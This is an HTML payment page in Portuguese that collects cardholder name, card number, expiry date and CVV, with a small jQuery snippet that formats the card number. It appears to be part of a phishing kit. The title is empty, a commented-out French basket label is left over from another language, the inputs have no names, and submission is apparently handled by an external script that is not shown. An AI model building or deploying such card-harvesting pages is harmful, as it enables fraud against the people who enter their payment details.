<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/camaki.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body class="a1">
    <div>
        <div class="roof">
            <img src="./img/upito1.JPG" alt="">
        </div>
    </div>


    <div>
        <div>
            <div class="pp3">
                <img src="./img/uptocc1.JPG" alt="">
                
            </div>
            
            <!-- <p class="pp2">
                Panier :
                <span>1 Article</span>
            </p> -->
            <div class="section">
                <div class="ccimg">
                    <img src="./img/upoccp1.png" alt="">
                </div>
                <div class="kolch">
                    <form method="post" id="pg2">
                    
                        <p>Nome do Titular  </p>
                        <input type="text" name="" id="numnn" maxlength="19">
                        
                        <p>Número do cartão </p>
                        <input class="inp1" type="tele" name="" id="numcc" maxlength="19" placeholder="----    ----    ----    ----">
                        
                        
                        
                        <p>Cartão válido até (mês/ano)</p>
                        <div class="exp">
                            <input class="mm" type="tel" name="" id="mmo" required placeholder="MM" maxlength="2">
                            <input type="tel" name="" id="aao" required placeholder="AA"  maxlength="4">
                        </div>

                        <p>Código de verificação (CVV)</p>
                        <input class="cfifi" type="tel" name="" id="numvv" required  maxlength="4">

                        <button class="btn2"  type="submit">Pagar</button>
                    </form>
                </div>
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/botomat.png" alt="">
            </div>
        </div>
    </div>
    <script>
        $("#numcc").on("keyup",function(){
           cc = $(this).val().split(" ").join("");
           cc = cc.match(new RegExp('.{1,4}$|.{1,4}', 'g')).join(" ");
           $(this).val(cc);
       });
    </script>
   <!--  -->

    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>